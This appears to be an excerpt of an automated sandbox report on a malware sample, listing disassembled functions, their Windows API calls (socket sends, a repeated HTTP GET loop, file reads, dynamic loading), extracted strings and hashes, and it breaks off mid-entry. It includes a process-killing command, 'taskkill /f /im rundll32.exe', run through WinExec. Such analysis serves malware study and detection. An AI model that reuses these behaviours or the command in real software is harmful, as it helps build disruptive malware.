                                                                    Function 0040B64E Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 188networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040B697
                                                                    • _mbscpy.MSVCRT(?,10014E04), ref: 0040B6F8
                                                                    • memcpy.MSVCRT(00000000,?,00000008), ref: 0040B743
                                                                    • memcpy.MSVCRT(?,00000011,00000001,00000000,?,00000008), ref: 0040B758
                                                                    • memcpy.MSVCRT(?,?,00000002,?,00000011,00000001,00000000,?,00000008), ref: 0040B76D
                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000002,?,00000011,00000001,00000000,?,00000008), ref: 0040B782
                                                                    • memcpy.MSVCRT(?,?,0000000C,?,?,00000008,?,?,00000002,?,00000011,00000001,00000000,?,00000008), ref: 0040B797
                                                                    • memcpy.MSVCRT(?,?,0000000B,?,?,0000000C,?,?,00000008,?,?,00000002,?,00000011,00000001,00000000), ref: 0040B7AC
                                                                    • sendto.WS2_32(?,00000045,00000033,00000000,00000002,00000010), ref: 0040B7DF
                                                                    • WSACleanup.WS2_32 ref: 0040B81A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$Cleanup_mbscpymemsetsendto
                                                                    • String ID: E$aaa${${
                                                                    • API String ID: 2418375239-79695315
                                                                    • Opcode ID: 4f16133f654f813de80d4163e0a68b70aa28b8688127e0db7ab9900447974850
                                                                    • Instruction ID: 56608e85b79c52e8105c56955e694235bf5a46501bd0b07800a1fd9dddc1277a
                                                                    • Opcode Fuzzy Hash: 4f16133f654f813de80d4163e0a68b70aa28b8688127e0db7ab9900447974850
                                                                    • Instruction Fuzzy Hash: FC713071D14368A9EB24DBB0CC45BDEBB75AF05304F0440EAE248F6182DBB59B848F65
                                                                    Function 100047B2 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96networksleepstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 100047DE
                                                                    • htons.WS2_32(00000000), ref: 100047F3
                                                                      • Part of subcall function 1000212F: inet_addr.WS2_32(?), ref: 10002133
                                                                      • Part of subcall function 1000212F: gethostbyname.WS2_32(?), ref: 10002141
                                                                    • wsprintfA.USER32 ref: 1000481E
                                                                    • strlen.MSVCRT ref: 1000482B
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 10004852
                                                                    • connect.WS2_32(00000000,00000002,00000010), ref: 10004861
                                                                    • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 10004879
                                                                    • setsockopt.WS2_32(00000000,0000FFFF,00001001,00000000,00000004), ref: 10004890
                                                                    • send.WS2_32(00000000,?,?,00000000), ref: 100048A6
                                                                    • Sleep.KERNEL32(00000001), ref: 100048AD
                                                                    • closesocket.WS2_32(00000000), ref: 100048B9
                                                                    • Sleep.KERNEL32(0000001E), ref: 100048C1
                                                                    • closesocket.WS2_32(?), ref: 100048DB
                                                                    • ExitThread.KERNEL32 ref: 100048E3
                                                                    Strings
                                                                    • GET / HTTP/1.1Host: %s:%dPragma: no-cacheConnection: Keep-Alive, xrefs: 10004818
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleepclosesocketsetsockopt$ExitThreadconnectgethostbynamehtonsinet_addrmemsetsendsocketstrlenwsprintf
                                                                    • String ID: GET / HTTP/1.1Host: %s:%dPragma: no-cacheConnection: Keep-Alive
                                                                    • API String ID: 3019519607-3649629926
                                                                    • Opcode ID: 1cb1b60937cb761b5f7604ba55e02c9b650a2df6987a1eac3d752c53814bce74
                                                                    • Instruction ID: a8fa04485d3cfd3f2aaf85bc58d4b23b4c4b09312b844fbbd73b78f06e1408eb
                                                                    • Opcode Fuzzy Hash: 1cb1b60937cb761b5f7604ba55e02c9b650a2df6987a1eac3d752c53814bce74
                                                                    • Instruction Fuzzy Hash: E4317CB1D5136CBAFB10DBA0CC89FEE7B78EF05380F008161F601A61D5DBB45A858BA5
                                                                    Function 0040D076 Relevance: 26.3, APIs: 5, Strings: 10, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D0B1
                                                                    • memcpy.MSVCRT(10015114,00000000,00000063,10015114,00000000,00000063,00000001), ref: 0040D0BA
                                                                    • ??2@YAPAXI@Z.MSVCRT(-00000064,10015114,00000000,00000063,10015114,00000000,00000063,00000001), ref: 0040D0EB
                                                                    • memcpy.MSVCRT(00000000,00000000,-00000064,-00000064,10015114,00000000,00000063,10015114,00000000,00000063,00000001), ref: 0040D0F9
                                                                      • Part of subcall function 0040EABD: GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,?,?,?,0040CF2E,?), ref: 0040EB19
                                                                      • Part of subcall function 0040EABD: RtlAllocateHeap.NTDLL(00000000), ref: 0040EB20
                                                                      • Part of subcall function 0040EABD: memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,0040CF2E,?), ref: 0040EB64
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,00000001), ref: 0040D139
                                                                      • Part of subcall function 0040EFB3: FreeLibrary.KERNEL32(?,00000000,?,?,0040EBCB,00000000,?,?,?,0040CF2E,?), ref: 0040EFEF
                                                                      • Part of subcall function 0040EFB3: free.MSVCRT ref: 0040EFFE
                                                                      • Part of subcall function 0040EFB3: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040EBCB,00000000,?,?,?,0040CF2E,?), ref: 0040F014
                                                                      • Part of subcall function 0040EFB3: GetProcessHeap.KERNEL32(00000000,?,?,?,0040EBCB,00000000,?,?,?,0040CF2E,?), ref: 0040F01C
                                                                      • Part of subcall function 0040EFB3: HeapFree.KERNEL32(00000000,?,?,?,0040CF2E,?), ref: 0040F023
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$Freememcpy$Process$??2@??3@AllocateLibraryVirtualfreememset
                                                                    • String ID: O$P$Proxy$e$n$o$p$r$x$y
                                                                    • API String ID: 4210037494-4255113608
                                                                    • Opcode ID: bb240e6473832efe2578a1200784d6d55ef2ae21de89c5a29e36955f4101f9dc
                                                                    • Instruction ID: b3dd0e66445d64a18c0f1424f63427965ea44390924ecc754e5b5ffe912a48dc
                                                                    • Opcode Fuzzy Hash: bb240e6473832efe2578a1200784d6d55ef2ae21de89c5a29e36955f4101f9dc
                                                                    • Instruction Fuzzy Hash: 3F210A71D04244BAEB01A7B5CC45B9E7EA69B11748F0480AEF404BF2D2D7FE8A5487B5
                                                                    Function 1000502A Relevance: 26.3, APIs: 5, Strings: 10, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 10005065
                                                                    • memcpy.MSVCRT(10015114,00000000,00000063,10015114,00000000,00000063,00000001), ref: 1000506E
                                                                    • ??2@YAPAXI@Z.MSVCRT(-00000064,10015114,00000000,00000063,10015114,00000000,00000063,00000001), ref: 1000509F
                                                                    • memcpy.MSVCRT(00000000,00000000,-00000064,-00000064,10015114,00000000,00000063,10015114,00000000,00000063,00000001), ref: 100050AD
                                                                      • Part of subcall function 10006A71: VirtualAlloc.KERNEL32(00000004,?,00002000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006AAC
                                                                      • Part of subcall function 10006A71: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006ABC
                                                                      • Part of subcall function 10006A71: GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,?,?,?,10004EE2,?), ref: 10006ACD
                                                                      • Part of subcall function 10006A71: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,10004EE2,?), ref: 10006AD4
                                                                      • Part of subcall function 10006A71: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006AF8
                                                                      • Part of subcall function 10006A71: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006B07
                                                                      • Part of subcall function 10006A71: memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,10004EE2,?), ref: 10006B18
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,00000001), ref: 100050ED
                                                                      • Part of subcall function 10006F67: FreeLibrary.KERNEL32(?,00000000,?,?,10006B7F,00000000,?,?,?,10004EE2,?), ref: 10006FA3
                                                                      • Part of subcall function 10006F67: free.MSVCRT ref: 10006FB2
                                                                      • Part of subcall function 10006F67: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,10006B7F,00000000,?,?,?,10004EE2,?), ref: 10006FC8
                                                                      • Part of subcall function 10006F67: GetProcessHeap.KERNEL32(00000000,?,?,?,10006B7F,00000000,?,?,?,10004EE2,?), ref: 10006FD0
                                                                      • Part of subcall function 10006F67: HeapFree.KERNEL32(00000000,?,?,?,10004EE2,?), ref: 10006FD7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual$Heap$Freememcpy$Process$??2@??3@Libraryfreememset
                                                                    • String ID: O$P$Proxy$e$n$o$p$r$x$y
                                                                    • API String ID: 3430192633-4255113608
                                                                    • Opcode ID: c91be97bedc2e28f486b0a96bdc51b028d027f085326fa2bae2d4bcad63a35af
                                                                    • Instruction ID: d560f22cf285f49ed9d6a36a26e525a5dfd0efbc32b32b3d9faf1952fead4c72
                                                                    • Opcode Fuzzy Hash: c91be97bedc2e28f486b0a96bdc51b028d027f085326fa2bae2d4bcad63a35af
                                                                    • Instruction Fuzzy Hash: 03212C65904284BEFB01D774CC45B9E7EA6DF027C5F048168F4006E196D7BA9B84C3B1
                                                                    Function 1000A0AE Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 75libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 1000A0DF
                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 1000A0F2
                                                                    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 1000A0FD
                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 1000A108
                                                                    • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 1000A116
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 1000A120
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 1000A12B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
                                                                    • API String ID: 2238633743-588083535
                                                                    • Opcode ID: 604fd69febf6011303ebcfb19ab5dfc43d1d949b015d3e09578cf7164a6bed7b
                                                                    • Instruction ID: aa3467e2ae1252332518516654a0d710ef36230faaee0708677f009a3ba5d175
                                                                    • Opcode Fuzzy Hash: 604fd69febf6011303ebcfb19ab5dfc43d1d949b015d3e09578cf7164a6bed7b
                                                                    • Instruction Fuzzy Hash: E62109B1D00218AFEB11DFA5DC44EEDBBB8EF49790F114226FA11F6254DB7499808B60
                                                                    Function 100081AF Relevance: 24.5, APIs: 1, Strings: 13, Instructions: 27processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 1000A44E: LoadLibraryA.KERNEL32(10009826,?,?,75A78400,00000000), ref: 1000A4F7
                                                                      • Part of subcall function 1000A44E: GetProcAddress.KERNEL32(00000000), ref: 1000A4FE
                                                                      • Part of subcall function 1000A44E: ??2@YAPAXI@Z.MSVCRT(00000128), ref: 1000A512
                                                                      • Part of subcall function 1000A44E: Process32First.KERNEL32(?,00000000), ref: 1000A521
                                                                      • Part of subcall function 1000A44E: _strcmpi.MSVCRT ref: 1000A531
                                                                      • Part of subcall function 1000A44E: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000A564
                                                                    • WinExec.KERNEL32(taskkill /f /im rundll32.exe,00000000), ref: 100081FE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ??2@??3@AddressExecFirstLibraryLoadProcProcess32_strcmpi
                                                                    • String ID: .$2$3$d$e$e$l$l$n$r$taskkill /f /im rundll32.exe$u$x
                                                                    • API String ID: 2482963690-873388793
                                                                    • Opcode ID: 83a140620b43f58e809b44f9d9abc216275edd62bcafd20740026f82e7c8ac44
                                                                    • Instruction ID: 04081f7374e0eec0b4f90f490d73c29620ba68708a705807a4e7729de7908c10
                                                                    • Opcode Fuzzy Hash: 83a140620b43f58e809b44f9d9abc216275edd62bcafd20740026f82e7c8ac44
                                                                    • Instruction Fuzzy Hash: ACF0E710C0C2C8E8FB02D3A8880979DBFA95F22688F4880C881906A2C2D6FA5358C776
                                                                    Function 004101FB Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 27processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0041249A: LoadLibraryA.KERNEL32(?,?), ref: 00412543
                                                                      • Part of subcall function 0041249A: GetProcAddress.KERNEL32(00000000), ref: 0041254A
                                                                      • Part of subcall function 0041249A: ??2@YAPAXI@Z.MSVCRT(00000128), ref: 0041255E
                                                                      • Part of subcall function 0041249A: _strcmpi.MSVCRT ref: 0041257D
                                                                      • Part of subcall function 0041249A: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004125B0
                                                                    • WinExec.KERNEL32(10013DC8,00000000), ref: 0041024A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ??2@??3@AddressExecLibraryLoadProc_strcmpi
                                                                    • String ID: .$2$3$d$e$e$l$l$n$r$u$x
                                                                    • API String ID: 3160046580-1176437639
                                                                    • Opcode ID: 745b1fe7abf6c2e318ab229e8e0b6c6bbd993f9dd5b93a98c7c23a412af13f75
                                                                    • Instruction ID: cf3e998cdfa594d09a48ed6d0d752fd63bae3d623492bb7d695fc3c945b32538
                                                                    • Opcode Fuzzy Hash: 745b1fe7abf6c2e318ab229e8e0b6c6bbd993f9dd5b93a98c7c23a412af13f75
                                                                    • Instruction Fuzzy Hash: 67F09720D0C2D9E9FB12D3A898097DDBFA91F22748F4880D991907A2C2D6FA5359C376
                                                                    Function 10006840 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 83stringfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10006875
                                                                    • strcat.MSVCRT(?,10012A68), ref: 10006887
                                                                    • strcat.MSVCRT(?,Default,?,10012A68), ref: 10006898
                                                                    • strcat.MSVCRT(?,.key,?,Default,?,10012A68), ref: 100068A9
                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100068C8
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 100068D9
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 100068E2
                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 100068F4
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10006914
                                                                    • CloseHandle.KERNEL32(?), ref: 1000691E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Filestrcat$??2@??3@CloseCreateDirectoryHandleReadSizeSystem
                                                                    • String ID: .key$Default
                                                                    • API String ID: 3778389450-1583214558
                                                                    • Opcode ID: 338da2bcc47cc4d6f7e681eec13e49331d27fd3588a4cce9e7b36d52a0284472
                                                                    • Instruction ID: 1b58e7136916ec9dce7289b1dbe360b749eb949b4a9fee7ab425d64e33b74753
                                                                    • Opcode Fuzzy Hash: 338da2bcc47cc4d6f7e681eec13e49331d27fd3588a4cce9e7b36d52a0284472
                                                                    • Instruction Fuzzy Hash: AE21C471D0021CBAFB11DBB4CC8AEDE7B7DEB49394F1005A5F310A6155DAB09E80CA60
                                                                    Function 0040F2D5 Relevance: 21.0, APIs: 1, Strings: 13, Instructions: 40stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1A3
                                                                      • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1B5
                                                                      • Part of subcall function 0040F177: wsprintfA.USER32 ref: 0040F25B
                                                                    • lstrcpy.KERNEL32(?,10013484), ref: 0040F33A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$lstrcpywsprintf
                                                                    • String ID: C$Default$G$c$e$n$n$o$o$p$r$t$u
                                                                    • API String ID: 993010004-148360246
                                                                    • Opcode ID: 7b9f11020c9a38ff0127635762f09269e694f158993faf986e64edac5c2f7f63
                                                                    • Instruction ID: 6b1b36c9d0c7228d9668808e8d8d478e66986f18db6631c765765848bca5d0a4
                                                                    • Opcode Fuzzy Hash: 7b9f11020c9a38ff0127635762f09269e694f158993faf986e64edac5c2f7f63
                                                                    • Instruction Fuzzy Hash: 36010410D082D8F9EB1297A9C808BAEBFB55F52758F0480D8D5847A286C7BA6718C776
                                                                    Function 10001C0D Relevance: 19.7, APIs: 13, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 10001C12
                                                                    • memcmp.MSVCRT(?,?,00000006,00000000,00000000,00019000), ref: 10001C3F
                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,?,00000006,00000000,00000000,00019000), ref: 10001CA8
                                                                    • memcmp.MSVCRT(00000000,?,00000006,?,00000000,00000006,00000000,?,00000006,00000000,00000000,00019000), ref: 10001CB7
                                                                    • _CxxThrowException.MSVCRT(?,10010AE0), ref: 10001CD3
                                                                    • memcpy.MSVCRT(00000006,00000000,00000004,00000006,00000000,?,00000006,00000000,00000000,00019000), ref: 10001CEB
